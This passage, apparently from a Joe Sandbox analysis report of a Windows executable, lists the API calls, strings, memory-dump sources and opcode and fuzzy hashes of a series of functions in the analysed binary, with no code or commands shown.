          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Connection__wcsnicmp_wcscpy_wcslen
          • String ID: LPT
          • API String ID: 3035604524-1350329615
          • Opcode ID: 8e2456e5c24cdd82ea1ba0c33fa18974f5c0f42ceb987109207d96c422488140
          • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
          • Opcode Fuzzy Hash: 8e2456e5c24cdd82ea1ba0c33fa18974f5c0f42ceb987109207d96c422488140
          • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memcmp
          • String ID: &
          • API String ID: 2931989736-1010288
          • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
          • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
          • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
          • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
          • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
          • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
          • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
          APIs
          • _wcslen.LIBCMT ref: 00466825
          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CrackInternet_wcslen
          • String ID: |
          • API String ID: 596671847-2343686810
          • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
          • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
          • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
          • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
          APIs
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend
          • String ID: '
          • API String ID: 3850602802-1997036262
          • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
          • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
          • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
          • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memmove
          • String ID: Error:
          • API String ID: 4104443479-232661952
          • Opcode ID: 5cc5d6e3c2bec352ce418e6cadac8e5176b3b023979c3691dd34592d740b2019
          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
          • Opcode Fuzzy Hash: 5cc5d6e3c2bec352ce418e6cadac8e5176b3b023979c3691dd34592d740b2019
          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
          APIs
          • _strlen.LIBCMT ref: 0040F858
            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
          • _sprintf.LIBCMT ref: 0040F9AE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memmove$_sprintf_strlen
          • String ID: %02X
          • API String ID: 1921645428-436463671
          • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
          • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
          • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
          • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
          APIs
          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend
          • String ID: Combobox
          • API String ID: 3850602802-2096851135
          • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
          • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
          • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
          • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
          APIs
          • GetWindowTextLengthW.USER32 ref: 0045134A
          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: LengthMessageSendTextWindow
          • String ID: edit
          • API String ID: 2978978980-2167791130
          • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
          • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
          • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
          • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
          APIs
          • Sleep.KERNEL32(00000000), ref: 00476CB0
          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: GlobalMemorySleepStatus
          • String ID: @
          • API String ID: 2783356886-2766056989
          • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
          • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
          • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
          • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: htonsinet_addr
          • String ID: 255.255.255.255
          • API String ID: 3832099526-2422070025
          • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
          • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
          • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
          • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
          APIs
          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: InternetOpen
          • String ID: <local>
          • API String ID: 2038078732-4266983199
          • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
          • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
          • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
          • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469F45
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend_memmove_wcslen
          • String ID: ComboBox$ListBox
          • API String ID: 547829025-1403004172
          • Opcode ID: 7c603411a5222602cdcfe3af15c4e08234e094dc848fc6b68a26e5d012d1898d
          • Instruction ID: 9c74662f9608889423dda9af8a150397af45232da82e66dff643b54ec21f234b
          • Opcode Fuzzy Hash: 7c603411a5222602cdcfe3af15c4e08234e094dc848fc6b68a26e5d012d1898d
          • Instruction Fuzzy Hash: 34012531600154A7CB00BE698C45A9F775D9B86330F10826FF918AB3C2DA789D8583A6
          APIs
          • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 0044CE78
          • _memmove.LIBCMT ref: 0044CE9F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ArrayCreateSafeVector_memmove
          • String ID: crts
          • API String ID: 564309351-3724388283
          • Opcode ID: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
          • Instruction ID: ae18a0e6088bde325f2b8f87e65bbb2aaade0ee39655e70765b31d945e00dc0b
          • Opcode Fuzzy Hash: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
          • Instruction Fuzzy Hash: 7B0122B390010CABD700DF5AEC41E9B77A8EB84300F00412BFA08D7241EB31EA52C7E0
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 00469FD4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend_memmove_wcslen
          • String ID: ComboBox$ListBox
          • API String ID: 547829025-1403004172
          • Opcode ID: 0e325451c43fc7f70be1918c47cd55933b25efa0ffc993eea719a8abd039539f
          • Instruction ID: 915c6be262c944f3857b3f41bddee0575e1aa44dc928e753307ac2ed03b09582
          • Opcode Fuzzy Hash: 0e325451c43fc7f70be1918c47cd55933b25efa0ffc993eea719a8abd039539f
          • Instruction Fuzzy Hash: DA01B53170015877CB10BAAA9C45BDF7B5C9B86320F41C46BB908E7282D678DE8983A9
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memmove
          • String ID: u,D
          • API String ID: 4104443479-3858472334
          • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
          • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
          • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
          • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
          APIs
          • _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • _memmove.LIBCMT ref: 00401B57
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
          • String ID: @EXITCODE
          • API String ID: 2734553683-3436989551
          • Opcode ID: 74abb26799b78f7c39373629ef55703545b90502918b5f0a848aece570e14613
          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
          • Opcode Fuzzy Hash: 74abb26799b78f7c39373629ef55703545b90502918b5f0a848aece570e14613
          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memmove
          • String ID: Error:
          • API String ID: 4104443479-232661952
          • Opcode ID: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
          • Instruction ID: e6e9f2aa443a554b8bda50df2a041f2c42dbd20d32390c21629c974d0e28b4a3
          • Opcode Fuzzy Hash: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
          • Instruction Fuzzy Hash: 2101EFB6200115ABC704DF49D981D6AF7A9FF88710708855AF819CB302D774FD20CBA4
          APIs
          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • wsprintfW.USER32 ref: 0045612A
          Strings
          Memory Dump Source
